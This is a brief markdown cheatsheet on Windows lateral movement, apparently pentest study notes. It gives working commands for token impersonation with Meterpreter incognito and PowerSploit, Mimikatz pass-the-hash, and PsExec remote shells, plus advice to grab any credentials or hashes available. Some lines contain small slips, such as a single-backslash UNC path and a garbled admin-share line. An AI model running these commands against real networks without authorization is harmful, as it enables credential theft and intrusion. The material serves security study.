---
title: Lateral Movement
categories: [cheatsheets]
tags: [security, windows]
---



# Lateral Movement

Detailed information:

https://fuzzysecurity.com/tutorials/25.html

Tools:

* nbtscan       # Get NetBios information for a host
* PSExec        # get shell to another host with credentials/or hash only!
* Mimikatz      # dump hashes, passwords, and do pretty much everything
* Incognite     # tool to impersonate tokens

## Smash-and-grab

* get whatever credentials you can get and try to use it
* passwords and hashes, doesnt matter


## Token impersonation

Grab tokens of other users (using NtQuerySysteminformation vodoo)
can impersonate these tokens to do stuff as another user!

-> user must be logged in!

```
<meterpreter session>
incognito> list_tokens -u
incognito> impersonate_token DOMAIN\username

// or, if it is working, use powersploit:

Invoke-TokenManipulation
```



## Mimikatz

Local Pass the Hash:
```
mimikatz> privilege::debug      # check if debug priv is set
mimikatz> sekurlsa::pth /user:<user> /domain:. /ntlm:<hash>
```


## PsExec

* metasploit module: `exploit/windows/smb/psexec`
* microsoft one: `cmd> PsExec.exe \10.0.0.100 -u <user> -p <pass> cmd`
* metasploit module: `exploit/windows/smb/psexec`

## Admin shares

Admin shares are automatically created by windows
contain all partitions as hidden admin share
`C:\ = \ip`